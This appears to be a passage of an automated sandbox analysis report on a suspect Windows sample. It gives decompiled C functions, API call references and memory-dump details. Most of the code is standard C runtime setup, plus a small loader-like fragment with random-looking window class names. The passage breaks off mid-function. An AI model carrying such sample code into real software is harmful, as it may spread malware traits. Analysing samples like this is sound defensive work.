    				intOrPtr* _t52;
    				intOrPtr* _t54;
    				void* _t55;
    				void* _t57;
    
    				_push(0x20);
    				_push(0x3009828);
    				E03005030(__ebx, __edi, __esi);
    				E03006E8E(__ebx, __edi, 8);
    				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    				_t57 =  *0x300be00 - 1; // 0x1
    				if(_t57 != 0) {
    					 *0x300bdfc = 1;
    					_t34 =  *((intOrPtr*)(_t55 + 0x10));
    					 *0x300bdf8 =  *((intOrPtr*)(_t55 + 0x10));
    					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
    						_t54 = __imp__DecodePointer; // executed
    						_t34 =  *_t54( *0x3013088); // executed
    						_t45 = 1;
    						 *((intOrPtr*)(_t55 - 0x30)) = 1;
    						if(1 != 0) {
    							_t34 =  *_t54( *0x3013084); // executed
    							_t52 = 1;
    							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
    							 *((intOrPtr*)(_t55 - 0x24)) = 1;
    							 *((intOrPtr*)(_t55 - 0x28)) = 1;
    							while(1) {
    								_t52 = _t52 - 4;
    								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    								if(_t52 < _t45) {
    									goto L11;
    								}
    								if( *_t52 == _t34) {
    									continue;
    								} else {
    									if(_t52 >= _t45) {
    										_t40 =  *_t54( *_t52); // executed
    										 *_t52 = E03004B90(_t40);
    										 *_t40();
    										_t43 =  *_t54( *0x3013088); // executed
    										_t47 = _t43;
    										_t34 =  *_t54( *0x3013084); // executed
    										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
    											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
    											_t52 = _t34;
    											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    										}
    										_t45 =  *((intOrPtr*)(_t55 - 0x30));
    										continue;
    									}
    								}
    								goto L11;
    							}
    						}
    						L11:
    						 *((intOrPtr*)(_t55 - 0x1c)) = 0x3001164;
    						while( *((intOrPtr*)(_t55 - 0x1c)) < 0x3001170) {
    							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
    							if(_t34 != 0) {
    								_t34 =  *_t34();
    							}
    							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
    						}
    					}
    					 *((intOrPtr*)(_t55 - 0x20)) = 0x3001174;
    					while( *((intOrPtr*)(_t55 - 0x20)) < 0x3001178) {
    						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
    						if(_t34 != 0) {
    							_t34 =  *_t34();
    						}
    						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
    					}
    				}
    				 *(_t55 - 4) = 0xfffffffe;
    				L23();
    				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    					return E03005075(_t34);
    				} else {
    					 *0x300be00 = 1;
    					_t36 = E03006DB5(8);
    					E03003F69( *((intOrPtr*)(_t55 + 8))); // executed
    					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    						return E03006DB5(8);
    					}
    					return _t36;
    				}
    			}

    APIs
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • DecodePointer.KERNEL32(03009828,00000020,030041E8,?,00000001,00000000,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040CB
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 030040DC
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • DecodePointer.KERNEL32(-00000004,?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004102
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 03004115
    • DecodePointer.KERNEL32(?,03004228,000000FF,?,03006EB5,00000011,?,?,03004C5D,0000000D), ref: 0300411F
      • Part of subcall function 03006DB5: LeaveCriticalSection.KERNEL32(?,03006E8C,0000000A,03006E7C,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 03006DC4
      • Part of subcall function 03003F69: ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 21%
    			E0300711B(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t11;
    				intOrPtr* _t12;
    				intOrPtr _t13;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				void* _t19;
    				intOrPtr _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t26;
    				void* _t27;
    				void* _t33;
    				signed int _t36;
    				intOrPtr* _t37;
    				void* _t39;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    
    				_t40 = __imp__DecodePointer;
    				_t11 =  *_t40( *0x3013088, _t33, _t39, _t23, _t27); // executed
    				_t24 = _t11;
    				_v8 = _t24;
    				_t12 =  *_t40( *0x3013084); // executed
    				_t41 = _t12;
    				if(_t41 < _t24) {
    					L11:
    					_t13 = 0;
    				} else {
    					_t36 = _t41 - _t24;
    					_t2 = _t36 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L11;
    					} else {
    						_t26 = E03008D8B(_t24);
    						_t3 = _t36 + 4; // 0x4
    						if(_t26 >= _t3) {
    							L10:
    							_t37 = __imp__EncodePointer; // executed
    							_t17 =  *_t37(_a4); // executed
    							 *_t41 = _t17;
    							_t18 =  *_t37(_t41 + 4); // executed
    							 *0x3013084 = _t18;
    							_t13 = _a4;
    						} else {
    							_t19 = 0x800;
    							if(_t26 < 0x800) {
    								_t19 = _t26;
    							}
    							_t20 = _t19 + _t26;
    							if(_t19 + _t26 < _t26) {
    								L7:
    								_t5 = _t26 + 0x10; // 0x10
    								_t21 = _t5;
    								if(_t5 < _t26) {
    									goto L11;
    								} else {
    									_t22 = E0300697F(_v8, _t21);
    									if(_t22 == 0) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								}
    							} else {
    								_t22 = E0300697F(_v8, _t20);
    								if(_t22 != 0) {
    									L9:
    									_t41 = _t22 + (_t36 >> 2) * 4;
    									__imp__EncodePointer(_t22);
    									 *0x3013088 = _t22;
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    				return _t13;
    			}

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 03007130
    • DecodePointer.KERNEL32(?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 0300713D
      • Part of subcall function 03008D8B: HeapSize.KERNEL32(00000000,00000000,?,00000003,03006CFD,03009938,00000008,03003F2A), ref: 03008DB6
      • Part of subcall function 0300697F: Sleep.KERNEL32(00000000,00000000,00000000,?,03007195,00000000,00000010,?,?,?,?,?,0300721F,?,03009998,0000000C), ref: 030069A9
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071A2
    • EncodePointer.KERNEL32(?,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071B6
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0300721F,?,03009998,0000000C,0300724B,?,?,03004037,03004B6A), ref: 030071BE
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0027E54C
      • Part of subcall function 0027E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0027E493
      • Part of subcall function 0027E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0027E4B6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E030045C7(signed int __eax, void* __ebx, signed int** _a4, intOrPtr* _a8) {
    				signed int _v8;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				signed int _t34;
    				signed int _t36;
    				signed int _t39;
    				void* _t40;
    				signed int _t41;
    				void* _t42;
    				signed short* _t44;
    				signed int** _t45;
    				void* _t46;
    				signed int _t47;
    				signed int* _t55;
    				signed int _t56;
    				signed int _t57;
    				signed int _t58;
    				signed int _t60;
    				signed int _t69;
    				unsigned int _t71;
    				signed int _t73;
    				signed int _t75;
    				intOrPtr* _t77;
    				void* _t80;
    				signed short* _t82;
    				signed int _t83;
    				signed int* _t85;
    				void* _t90;
    
    				_t46 = __ebx;
    				_t82 =  *0x300bdc4; // 0x0
    				_t73 = 0;
    				if(_t82 != 0) {
    					while(1) {
    						_t34 =  *_t82 & 0x0000ffff;
    						if(_t34 != 0) {
    							if(_t34 != 0x3d) {
    								_t73 = _t73 + 1;
    							}
    						} else {
    							break;
    						}
    						_t82 = _t82 + 2 + E0300765A(_t82) * 2;
    					}
    					_push(_t46);
    					_t36 = E03006933(_t73 + 1, 4);
    					_t47 = _t36;
    					 *0x300bde8 = _t47;
    					if(_t47 != 0) {
    						_t83 =  *0x300bdc4; // 0x0
    						while( *_t83 != 0) {
    							_t4 = E0300765A(_t83) + 1; // 0x1
    							_t75 = _t4;
    							if( *_t83 == 0x3d) {
    								L13:
    								_t83 = _t83 + _t75 * 2;
    								continue;
    							} else {
    								_t40 = E03006933(_t75, 2); // executed
    								_pop(_t55);
    								 *_t47 = _t40;
    								if(_t40 == 0) {
    									_t41 = E03006891( *0x300bde8);
    									 *0x300bde8 =  *0x300bde8 & 0x00000000;
    									_t39 = _t41 | 0xffffffff;
    									L16:
    									goto L17;
    								} else {
    									_t42 = E03007675(_t40, _t75, _t83);
    									_t90 = _t90 + 0xc;
    									if(_t42 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_t44 = E03003E01();
    										asm("int3");
    										_push(_t55);
    										_push(_t83);
    										_t69 = 0;
    										_push(_t75);
    										_t77 = _v24;
    										 *_t47 = 0;
    										_t85 = _t55;
    										 *_t77 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t85;
    										}
    										do {
    											if( *_t44 != 0x22) {
    												 *_t47 =  *_t47 + 1;
    												if(_t85 != 0) {
    													 *_t85 =  *_t44;
    													_t85 =  &(_t85[0]);
    												}
    												_t56 =  *_t44 & 0x0000ffff;
    												_t44 =  &(_t44[1]);
    												if(_t56 == 0) {
    													_t44 = _t44 - 2;
    												} else {
    													goto L28;
    												}
    											} else {
    												_t77 = _a8;
    												_t44 =  &(_t44[1]);
    												_t69 = 0 | _t69 == 0x00000000;
    												_t56 = 0x22;
    												goto L28;
    											}
    											L33:
    											_v8 = _v8 & 0x00000000;
    											L34:
    											while( *_t44 != 0) {
    												while(1) {
    													_t57 =  *_t44 & 0x0000ffff;
    													if(_t57 != 0x20 && _t57 != 9) {
    														break;
    													}
    													_t44 =  &(_t44[1]);
    												}
    												if( *_t44 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t85;
    													}
    													 *_t77 =  *_t77 + 1;
    													while(1) {
    														_t80 = 1;
    														_t71 = 0;
    														L45:
    														while( *_t44 == 0x5c) {
    															_t44 =  &(_t44[1]);
    															_t71 = _t71 + 1;
    														}
    														if( *_t44 == 0x22) {
    															if((_t71 & 0x00000001) == 0) {
    																if(_v8 == 0 || _t44[1] != 0x22) {
    																	_t80 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t44 =  &(_t44[1]);
    																}
    															}
    															_t71 = _t71 >> 1;
    														}
    														while(_t71 != 0) {
    															_t71 = _t71 - 1;
    															if(_t85 != 0) {
    																_t60 = 0x5c;
    																 *_t85 = _t60;
    																_t85 =  &(_t85[0]);
    															}
    															 *_t47 =  *_t47 + 1;
    														}
    														_t58 =  *_t44 & 0x0000ffff;
    														if(_t58 != 0 && (_v8 != _t71 || _t58 != 0x20 && _t58 != 9)) {
    															if(_t80 != 0) {
    																if(_t85 != 0) {
    																	 *_t85 = _t58;
    																	_t85 =  &(_t85[0]);
    																}
    																 *_t47 =  *_t47 + 1;
    															}
    															_t44 =  &(_t44[1]);
    															_t80 = 1;
    															_t71 = 0;
    															goto L45;
    														}
    														if(_t85 != 0) {
    															 *_t85 = 0;
    															_t85 =  &(_t85[0]);
    														}
    														 *_t47 =  *_t47 + 1;
    														_t77 = _a8;
    														goto L34;
    													}
    												}
    												break;
    											}
    											_t45 = _a4;
    											if(_t45 != 0) {
    												 *_t45 = 0;
    											}
    											 *_t77 =  *_t77 + 1;
    											return _t45;
    											goto L72;
    											L28:
    										} while (_t69 != 0 || _t56 != 0x20 && _t56 != 9);
    										if(_t85 != 0) {
    											 *((short*)(_t85 - 2)) = 0;
    										}
    										goto L33;
    									} else {
    										_t47 = _t47 + 4;
    										goto L13;
    									}
    								}
    							}
    							goto L72;
    						}
    						E03006891( *0x300bdc4);
    						 *0x300bdc4 =  *0x300bdc4 & 0x00000000;
    						 *_t47 =  *_t47 & 0x00000000;
    						 *0x3013080 = 1;
    						_t39 = 0;
    						goto L16;
    					} else {
    						_t39 = _t36 | 0xffffffff;
    						L17:
    						goto L18;
    					}
    				} else {
    					_t39 = __eax | 0xffffffff;
    					L18:
    					return _t39;
    				}
    				L72:
    			}

    APIs
    • _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • _wcslen.LIBCMT ref: 0300461F
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 23%
    			E03003FEA(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t4;
    				intOrPtr* _t10;
    				void* _t18;
    				intOrPtr* _t19;
    				void* _t21;
    
    				_t21 = __esi;
    				_t18 = __edi;
    				_t24 =  *0x3013090;
    				if( *0x3013090 != 0 && E030072F0(_t24, 0x3013090) != 0) {
    					_t2 =  *0x3013090(_a4);
    				}
    				E030068CB(_t2);
    				_t4 = E03003FC6(0x3001148, 0x3001160); // executed
    				_t26 = _t4;
    				if(_t4 == 0) {
    					_push(_t21);
    					_push(_t18);
    					E0300723E(_t26, E03004B6A); // executed
    					_t19 = 0x3001140;
    					if(0x3001140 >= 0x3001144) {
    						L8:
    						_t30 =  *0x3013094;
    						if( *0x3013094 != 0 && E030072F0(_t30, 0x3013094) != 0) {
    							 *0x3013094(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t10 =  *_t19;
    						if(_t10 != 0) {
    							 *_t10();
    						}
    						_t19 = _t19 + 4;
    					} while (_t19 < 0x3001144);
    					goto L8;
    				}
    				return _t4;
    			}

    APIs
      • Part of subcall function 030068CB: EncodePointer.KERNEL32(6D9A0167,?,?,03004016), ref: 030068D7
    • __initterm_e.LIBCMT ref: 03004020
      • Part of subcall function 030072F0: __FindPESection.LIBCMT ref: 0300734B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E03008A59(signed int _a4, signed int _a8, intOrPtr* _a12) {
    				void* _t10;
    				intOrPtr* _t12;
    				signed int _t13;
    				signed int _t17;
    				intOrPtr* _t19;
    				long _t24;
    
    				_t17 = _a4;
    				if(_t17 == 0) {
    					L3:
    					_t24 = _t17 * _a8;
    					if(_t24 == 0) {
    						_t24 = _t24 + 1;
    					}
    					goto L5;
    					L6:
    					_t10 = RtlAllocateHeap( *0x300c64c, 8, _t24); // executed
    					if(0 == 0) {
    						goto L7;
    					}
    					L14:
    					return _t10;
    					goto L15;
    					L7:
    					if( *0x300cb3c == 0) {
    						_t19 = _a12;
    						if(_t19 != 0) {
    							 *_t19 = 0xc;
    						}
    					} else {
    						if(E030070F3(_t10, _t24) != 0) {
    							L5:
    							_t10 = 0;
    							if(_t24 > 0xffffffe0) {
    								goto L7;
    							} else {
    								goto L6;
    							}
    						} else {
    							_t12 = _a12;
    							if(_t12 != 0) {
    								 *_t12 = 0xc;
    							}
    							_t10 = 0;
    						}
    					}
    					goto L14;
    				} else {
    					_t13 = 0xffffffe0;
    					if(_t13 / _t17 >= _a8) {
    						goto L3;
    					} else {
    						 *((intOrPtr*)(E03003EA5())) = 0xc;
    						return 0;
    					}
    				}
    				L15:
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214,?,03003EAA), ref: 03008A9C
      • Part of subcall function 030070F3: DecodePointer.KERNEL32(?,03008AB5,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214), ref: 030070FE
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E030071D1() {
    				signed int* _t1;
    				void* _t3;
    				signed int* _t6;
    
    				_t1 = E03006933(0x20, 4);
    				_t6 = _t1;
    				__imp__EncodePointer(_t6); // executed
    				 *0x3013088 = _t1;
    				 *0x3013084 = _t1;
    				if(_t6 != 0) {
    					 *_t6 =  *_t6 & 0x00000000;
    					return 0;
    				} else {
    					_t3 = 0x18;
    					return _t3;
    				}
    			}

    APIs
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • EncodePointer.KERNEL32(00000000), ref: 030071E2
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • EncodePointer.KERNEL32(6D9A0167,?,?,03004016), ref: 030068D7
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03005004() {
    				void* _t3;
    
    				_t3 = HeapCreate(0, 0x1000, 0); // executed
    				 *0x300c64c = _t3;
    				return 0 | _t3 != 0x00000000;
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,03002D8D), ref: 0300500D
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03003F69(int _a4) {
    
    				E03003F3E(_a4);
    				ExitProcess(_a4);
    			}

    APIs
      • Part of subcall function 03003F3E: GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
      • Part of subcall function 03003F3E: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    • ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • EncodePointer.KERNEL32(Function_00006CCA,03003FC1,00000000,00000000,00000000,00000000,00000000,00000000,771CF9A3,03004F54,?,03002D9E), ref: 03006D08
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03006933(signed int _a4, signed int _a8) {
    				void* _t4;
    				long _t6;
    				void* _t7;
    				long _t8;
    				void* _t9;
    				void* _t12;
    				void* _t13;
    
    				_t8 = 0;
    				while(1) {
    					_t4 = E03008A59(_a4, _a8, 0); // executed
    					_t7 = _t4;
    					_t9 = _t9 + 0xc;
    					if(_t7 != 0) {
    						break;
    					}
    					_t12 =  *0x300c670 - _t4; // 0x0
    					if(_t12 > 0) {
    						Sleep(_t8);
    						_t3 = _t8 + 0x3e8; // 0x3e8
    						_t6 = _t3;
    						_t13 = _t6 -  *0x300c670; // 0x0
    						if(_t13 > 0) {
    							_t6 = _t6 | 0xffffffff;
    						}
    						_t8 = _t6;
    						if(_t6 != 0xffffffff) {
    							continue;
    						}
    					}
    					break;
    				}
    				return _t7;
    			}

    APIs
      • Part of subcall function 03008A59: RtlAllocateHeap.NTDLL(00000008,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214,?,03003EAA), ref: 03008A9C
    • Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 100%
    			E0300521F() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t25;
    				signed int _t34;
    
    				_t14 =  *0x300bbe4; // 0x1979767b
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t34 != 0xbb40e64e) {
    						if((0xffff0000 & _t34) == 0) {
    							_t22 = (_t34 | 0x00004711) << 0x10;
    							_t34 = _t34 | _t22;
    						}
    					} else {
    						_t34 = 0xbb40e64f;
    					}
    					 *0x300bbe4 = _t34;
    					 *0x300bbe8 =  !_t34;
    					return _t22;
    				} else {
    					_t25 =  !_t14;
    					 *0x300bbe8 = _t25;
    					return _t25;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 03005256
    • GetCurrentProcessId.KERNEL32 ref: 03005262
    • GetCurrentThreadId.KERNEL32 ref: 0300526A
    • GetTickCount.KERNEL32 ref: 03005272
    • QueryPerformanceCounter.KERNEL32(?), ref: 0300527E
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E03005429(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
    				signed int _v8;
    				char _v15;
    				void _v16;
    				short _v1724;
    				char _v5140;
    				void _v6844;
    				short _v6848;
    				long _v6852;
    				signed char _v6853;
    				long _v6860;
    				long _v6864;
    				int _v6868;
    				long _v6872;
    				long _v6876;
    				long _v6880;
    				long _v6884;
    				signed int _v6888;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t209;
    				long _t211;
    				intOrPtr _t214;
    				long _t215;
    				intOrPtr _t216;
    				long _t217;
    				void* _t223;
    				signed int _t225;
    				signed int* _t230;
    				long _t242;
    				long _t245;
    				signed int* _t246;
    				long _t252;
    				long _t253;
    				signed int* _t256;
    				long _t262;
    				long _t263;
    				void* _t267;
    				long _t271;
    				int _t272;
    				long _t274;
    				void* _t275;
    				short _t277;
    				void* _t278;
    				void* _t282;
    				long _t284;
    				void* _t286;
    				int _t293;
    				int _t300;
    				void* _t304;
    				intOrPtr* _t313;
    				long _t314;
    				signed int _t315;
    				signed short* _t316;
    				signed int _t317;
    				long _t318;
    				signed short* _t319;
    				signed char _t322;
    				long _t331;
    				long _t335;
    				long _t337;
    				char _t341;
    				signed int _t352;
    				long _t355;
    				void* _t356;
    				void* _t357;
    				long _t359;
    				signed int _t361;
    				void* _t362;
    
    				_t350 = __edx;
    				_t312 = __ebx;
    				E03007F10(0x1ae4);
    				_t209 =  *0x300bbe4; // 0x1979767b
    				_v8 = _t209 ^ _t361;
    				_t211 = _a8;
    				_t355 = _a4;
    				_t352 = 0;
    				_v6864 = _t211;
    				_v6860 = 0;
    				_v6868 = 0;
    				if(_a12 != 0) {
    					__eflags = _t211;
    					if(_t211 != 0) {
    						_push(__ebx);
